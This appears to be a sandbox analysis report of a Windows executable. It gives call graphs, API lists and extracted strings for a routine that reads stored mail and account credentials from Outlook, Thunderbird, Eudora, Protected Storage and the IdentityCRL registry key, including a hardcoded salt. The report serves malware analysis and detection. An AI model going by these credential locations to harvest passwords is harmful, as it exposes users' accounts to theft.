sprintf 33627->33629 33790 4023e5 16 API calls 33628->33790 33629->33628 33632 44b090 33631->33632 33633 40fb10 RegOpenKeyExA 33632->33633 33634 403e7f 33633->33634 33635 40fb3b RegOpenKeyExA 33633->33635 33645 40f96c 33634->33645 33636 40fb55 RegQueryValueExA 33635->33636 33637 40fc2d RegCloseKey 33635->33637 33638 40fc23 RegCloseKey 33636->33638 33639 40fb84 33636->33639 33637->33634 33638->33637 33640 404734 3 API calls 33639->33640 33641 40fb91 33640->33641 33641->33638 33642 40fc19 LocalFree 33641->33642 33643 40fbdd memcpy memcpy 33641->33643 33642->33638 33795 40f802 11 API calls 33643->33795 33646 4070ae GetVersionExA 33645->33646 33647 40f98d 33646->33647 33648 4045db 7 API calls 33647->33648 33649 40f9a9 33648->33649 33652 40fae6 33649->33652 33653 40fa13 memset WideCharToMultiByte 33649->33653 33650 404656 FreeLibrary 33651 403e85 33650->33651 33657 4442ea memset 33651->33657 33652->33650 33653->33649 33654 40fa43 _strnicmp 33653->33654 33654->33649 33655 40fa5b WideCharToMultiByte 33654->33655 33655->33649 33656 40fa88 WideCharToMultiByte 33655->33656 33656->33649 33658 410dbb 9 API calls 33657->33658 33659 444329 33658->33659 33796 40759e strlen strlen 33659->33796 33664 410dbb 9 API calls 33665 444350 33664->33665 33666 40759e 3 API calls 33665->33666 33667 44435a 33666->33667 33668 444212 65 API calls 33667->33668 33669 444366 memset memset 33668->33669 33670 410b1e 3 API calls 33669->33670 33671 4443b9 ExpandEnvironmentStringsA strlen 33670->33671 33672 4443f4 _strcmpi 33671->33672 33673 4443e5 33671->33673 33674 403e91 33672->33674 33675 44440c 33672->33675 33673->33672 33674->33253 33676 444212 65 API calls 33675->33676 33676->33674 33677->33422 33678->33426 33679->33434 33680->33438 33681->33442 33682->33460 33683->33461 33684->33488 33685->33492 33686->33485 33688 40841c 33687->33688 33689 410a9c RegOpenKeyExA 33688->33689 33689->33501 33690->33507 33691->33507 33692->33511 33693->33513 33694->33507 33695->33516 33696->33522 33697->33522 33698->33525 33699->33522 33701 404656 FreeLibrary 33700->33701 33702 4045e3 LoadLibraryA 33701->33702 33703 404651 33702->33703 33704 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33702->33704 33703->33528 33703->33532 33705 40463d 33704->33705 33706 404643 33705->33706 33707 404656 FreeLibrary 33705->33707 33706->33703 33707->33703 33709 403cd2 33708->33709 33710 40465c FreeLibrary 33708->33710 33709->33541 33710->33709 33711->33538 33712->33545 33713->33559 33714->33553 33715->33554 33716->33559 33717->33559 33718->33559 33719->33570 33720->33578 33721->33578 33722->33578 33723->33578 33724->33588 33725->33590 33726->33591 33727->33595 33728->33596 33729->33596 33730->33605 33731->33602 33732->33611 33771 4078ba 33733->33771 33736 4078ba _mbsnbcat 33737 40f5a3 RegOpenKeyExA 33736->33737 33738 40f5c3 RegQueryValueExA 33737->33738 33739 40f6d9 33737->33739 33740 40f6d0 RegCloseKey 33738->33740 33741 40f5f0 33738->33741 33739->33611 33740->33739 33741->33740 33742 40f675 33741->33742 33775 40466b _mbscpy 33741->33775 33742->33740 33776 4012ee strlen 33742->33776 33744 40f611 33746 404734 3 API calls 33744->33746 33751 40f616 33746->33751 33747 40f69e RegQueryValueExA 33747->33740 33748 40f6c1 33747->33748 33748->33740 33749 40f66a 33750 404785 FreeLibrary 33749->33750 33750->33742 33751->33749 33752 40f661 LocalFree 33751->33752 33753 40f645 memcpy 33751->33753 33752->33749 33753->33752 33777 40466b _mbscpy 33754->33777 33756 40f6fa 33757 4045db 7 API calls 33756->33757 33758 40f708 33757->33758 33760 404734 3 API calls 33758->33760 33764 40f7e2 33758->33764 33759 404656 FreeLibrary 33761 40f7f1 33759->33761 33765 40f715 33760->33765 33762 404785 FreeLibrary 33761->33762 33763 40f7fc 33762->33763 33763->33611 33764->33759 33765->33764 33766 40f797 WideCharToMultiByte 33765->33766 33767 40f7b8 strlen 33766->33767 33768 40f7d9 LocalFree 33766->33768 33767->33768 33769 40f7c8 _mbscpy 33767->33769 33768->33764 33769->33768 33770->33611 33772 4078e6 33771->33772 33773 4078c7 _mbsnbcat 33772->33773 33774 4078ea 33772->33774 33773->33772 33774->33736 33775->33744 33776->33747 33777->33756 33791 410a9c RegOpenKeyExA 33778->33791 33780 44458b 33781 40381a 33780->33781 33792 410add RegQueryValueExA 33780->33792 33781->33618 33789 4021b6 memset 33781->33789 33783 4445a4 33784 4445dc RegCloseKey 33783->33784 33793 410add RegQueryValueExA 33783->33793 33784->33781 33786 4445c1 33786->33784 33794 444879 30 API calls 33786->33794 33788 4445da 33788->33784 33789->33621 33790->33618 33791->33780 33792->33783 33793->33786 33794->33788 33795->33642 33797 4075c9 33796->33797 33798 4075bb _mbscat 33796->33798 33799 444212 33797->33799 33798->33797 33816 407e9d 33799->33816 33802 44424d 33803 444274 33802->33803 33805 444258 33802->33805 33824 407ef8 33802->33824 33804 407e9d 9 API calls 33803->33804 33813 4442a0 33804->33813 33837 444196 52 API calls 33805->33837 33807 407ef8 9 API calls 33807->33813 33808 4442ce 33834 407f90 33808->33834 33812 407f90 FindClose 33814 4442e4 33812->33814 33813->33807 33813->33808 33815 444212 65 API calls 33813->33815 33838 407e62 strcmp strcmp 33813->33838 33814->33664 33815->33813 33817 407f90 FindClose 33816->33817 33818 407eaa 33817->33818 33819 406f06 2 API calls 33818->33819 33820 407ebd strlen strlen 33819->33820 33821 407ee1 33820->33821 33822 407eea 33820->33822 33839 4070e3 strlen _mbscat _mbscpy _mbscat 33821->33839 33822->33802 33825 407f03 FindFirstFileA 33824->33825 33826 407f24 FindNextFileA 33824->33826 33829 407f3f 33825->33829 33827 407f46 strlen strlen 33826->33827 33828 407f3a 33826->33828 33831 407f7f 33827->33831 33832 407f76 33827->33832 33830 407f90 FindClose 33828->33830 33829->33827 33829->33831 33830->33829 33831->33802 33840 4070e3 strlen _mbscat _mbscpy _mbscat 33832->33840 33835 407fa3 33834->33835 33836 407f99 FindClose 33834->33836 33835->33812 33836->33835 33837->33802 33838->33813 33839->33822 33840->33831 33841->33266 33842->33270 33843->33276 33844->33277 33845->33283 33846->33280 33847->33275 34192 43ffc8 18 API calls 34194 4383cc 110 API calls __fprintf_l 34006 4275d3 41 API calls 34195 4153d3 22 API calls __fprintf_l 34007 444dd7 _XcptFilter 34200 4013de 15 API calls 34202 425115 111 API calls __fprintf_l 34203 43f7db 18 API calls 34206 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34010 4335ee 16 API calls __fprintf_l 34208 429fef 11 API calls 34011 444deb _exit _c_exit 34209 40bbf0 138 API calls 34014 425115 79 API calls __fprintf_l 34213 437ffa 22 API calls 34018 4021ff 14 API calls 34019 43f5fc 149 API calls 34214 40e381 9 API calls 34021 405983 40 API calls 34022 42b186 27 API calls __fprintf_l 34023 427d86 76 API calls 34024 403585 20 API calls 34026 42e58e 18 API calls __fprintf_l 34029 425115 75 API calls __fprintf_l 34031 401592 8 API calls 32934 410b92 32937 410a6b 32934->32937 32936 410bb2 32938 410a77 32937->32938 32939 410a89 GetPrivateProfileIntA 32937->32939 32942 410983 memset _itoa WritePrivateProfileStringA 32938->32942 32939->32936 32941 410a84 32941->32936 32942->32941 34218 434395 16 API calls 34033 441d9c memcmp 34220 43f79b 119 API calls 34034 40c599 43 API calls 34221 426741 87 API calls 34038 4401a6 21 API calls 34040 426da6 memcpy memset memset memcpy 34041 4335a5 15 API calls 34043 4299ab memset memset memcpy memset memset 34044 40b1ab 8 API calls 34226 425115 76 API calls __fprintf_l 34230 4113b2 18 API calls 2 library calls 34234 40a3b8 memset sprintf SendMessageA 33848 410bbc 33851 4109cf 33848->33851 33852 4109dc 33851->33852 33853 410a23 memset GetPrivateProfileStringA 33852->33853 33854 4109ea memset 33852->33854 33859 407646 strlen 33853->33859 33864 4075cd sprintf memcpy 33854->33864 33857 410a0c WritePrivateProfileStringA 33858 410a65 33857->33858 33860 40765a 33859->33860 33862 40765c 33859->33862 33860->33858 33861 4076a3 33861->33858 33862->33861 33865 40737c strtoul 33862->33865 33864->33857 33865->33862 34046 40b5bf memset memset _mbsicmp

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040832F
                                                                                                                                                              • memset.MSVCRT ref: 00408343
                                                                                                                                                              • memset.MSVCRT ref: 0040835F
                                                                                                                                                              • memset.MSVCRT ref: 00408376
                                                                                                                                                              • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                              • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                              • strlen.MSVCRT ref: 004083E9
                                                                                                                                                              • strlen.MSVCRT ref: 004083F8
                                                                                                                                                              • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                              • String ID: 5$H$O$b$i$}$}
                                                                                                                                                              • API String ID: 1832431107-3760989150
                                                                                                                                                              • Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                                                                              • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                                                                              • Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                                                                              • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                                                                                              APIs
                                                                                                                                                              • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                                                                              • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                                                                              • strlen.MSVCRT ref: 00407F5C
                                                                                                                                                              • strlen.MSVCRT ref: 00407F64
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileFindstrlen$FirstNext
                                                                                                                                                              • String ID: ACD
                                                                                                                                                              • API String ID: 379999529-620537770
                                                                                                                                                              • Opcode ID: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                                                                                              • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                                                                              • Opcode Fuzzy Hash: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                                                                                              • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 00401E8B
                                                                                                                                                              • strlen.MSVCRT ref: 00401EA4
                                                                                                                                                              • strlen.MSVCRT ref: 00401EB2
                                                                                                                                                              • strlen.MSVCRT ref: 00401EF8
                                                                                                                                                              • strlen.MSVCRT ref: 00401F06
                                                                                                                                                              • memset.MSVCRT ref: 00401FB1
                                                                                                                                                              • atoi.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401FE0
                                                                                                                                                              • memset.MSVCRT ref: 00402003
                                                                                                                                                              • sprintf.MSVCRT ref: 00402030
                                                                                                                                                                • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                              • memset.MSVCRT ref: 00402086
                                                                                                                                                              • memset.MSVCRT ref: 0040209B
                                                                                                                                                              • strlen.MSVCRT ref: 004020A1
                                                                                                                                                              • strlen.MSVCRT ref: 004020AF
                                                                                                                                                              • strlen.MSVCRT ref: 004020E2
                                                                                                                                                              • strlen.MSVCRT ref: 004020F0
                                                                                                                                                              • memset.MSVCRT ref: 00402018
                                                                                                                                                                • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                              • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402181
                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C
                                                                                                                                                                • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                                                                              • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                                              • API String ID: 1846531875-4223776976
                                                                                                                                                              • Opcode ID: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                                                                                              • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                                                                              • Opcode Fuzzy Hash: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                                                                                              • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll,74DF0A60,?,00000000,?,?,?,0040CF60,74DF0A60), ref: 00404AB8
                                                                                                                                                                • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                                                                • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,74DF0A60), ref: 00404ADE
                                                                                                                                                                • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                                                                              • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                                                                              • API String ID: 745651260-375988210
                                                                                                                                                              • Opcode ID: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                                                                              • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                                                                                              • Opcode Fuzzy Hash: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                                                                              • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                                                                              • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                                                                                              • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                                                                              Strings
                                                                                                                                                              • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                                                                              • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                                                                              • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                                                                              • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                                                                              • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                                                                              • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                                                                              • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                                                                              • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                                                                              • pstorec.dll, xrefs: 00403C30
                                                                                                                                                              • PStoreCreateInstance, xrefs: 00403C44
                                                                                                                                                              • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                                                                              • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                                                                              • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                                                              • API String ID: 1197458902-317895162
                                                                                                                                                              • Opcode ID: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                                                                              • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                                                                                              • Opcode Fuzzy Hash: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                                                                              • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 231 40c3d0-40c420 memset GetModuleFileNameA strrchr 232 40c422 231->232 233 40c425-40c4f6 _mbscat _mbscpy * 2 231->233 232->233 238 40c512-40c531 233->238 239 40c4f8-40c500 233->239 242 40c533 call 4017d2 238->242 243 40c538-40c550 call 409b31 238->243 239->238 240 40c502-40c50c GetWindowPlacement 239->240 240->238 242->243
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040C3F7
                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                                                                              • strrchr.MSVCRT ref: 0040C417
                                                                                                                                                              • _mbscat.MSVCRT ref: 0040C431
                                                                                                                                                              • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                                                                              • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                                                                              • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                                                              • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                                                                              • API String ID: 1012775001-1343505058
                                                                                                                                                              • Opcode ID: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                                                                              • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                                                                              • Opcode Fuzzy Hash: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                                                                              • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 247 44b49f-44b4b0 call 444e38 GetModuleHandleA 251 444c87-444d00 __set_app_type __p__fmode __p__commode call 444e34 247->251 252 444c68-444c73 247->252 258 444d02-444d0d __setusermatherr 251->258 259 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 251->259 252->251 253 444c75-444c85 252->253 253->251 258->259 262 444d6a-444d72 259->262 263 444d74-444d76 262->263 264 444d78-444d7b 262->264 263->262 263->264 265 444d81-444d85 264->265 266 444d7d-444d7e 264->266 267 444d87-444d89 265->267 268 444d8b-444dc6 GetStartupInfoA GetModuleHandleA call 40cf44 265->268 266->265 267->266 267->268 273 444dcf-444e0f _cexit call 444e71 268->273 274 444dc8-444dc9 exit 268->274 274->273
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                              • String ID: h4ND
                                                                                                                                                              • API String ID: 3662548030-3825183422
                                                                                                                                                              • Opcode ID: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                                                                                              • Instruction ID: 35bbd85eb0bb2ce5e1f1b9c4bc8677619723fc104b62ea38f54f9f601267cc63
                                                                                                                                                              • Opcode Fuzzy Hash: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                                                                                              • Instruction Fuzzy Hash: D941D3B5C023449FEB619FA4DC847AD7BB4FB49325B28412BE451A32A1D7788D41CB5C

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 278 40fb00-40fb35 call 44b090 RegOpenKeyExA 281 40fc37-40fc3d 278->281 282 40fb3b-40fb4f RegOpenKeyExA 278->282 283 40fb55-40fb7e RegQueryValueExA 282->283 284 40fc2d-40fc31 RegCloseKey 282->284 285 40fc23-40fc27 RegCloseKey 283->285 286 40fb84-40fb93 call 404734 283->286 284->281 285->284 286->285 289 40fb99-40fbd1 call 4047a5 286->289 289->285 292 40fbd3-40fbdb 289->292 293 40fc19-40fc1d LocalFree 292->293 294 40fbdd-40fc14 memcpy * 2 call 40f802 292->294 293->285 294->293
                                                                                                                                                              APIs
                                                                                                                                                              • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                                                                                              • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                                                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                              • memcpy.MSVCRT(?,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                                                                                              • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                                                                                                • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                                                                • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                                                                                • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                              • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
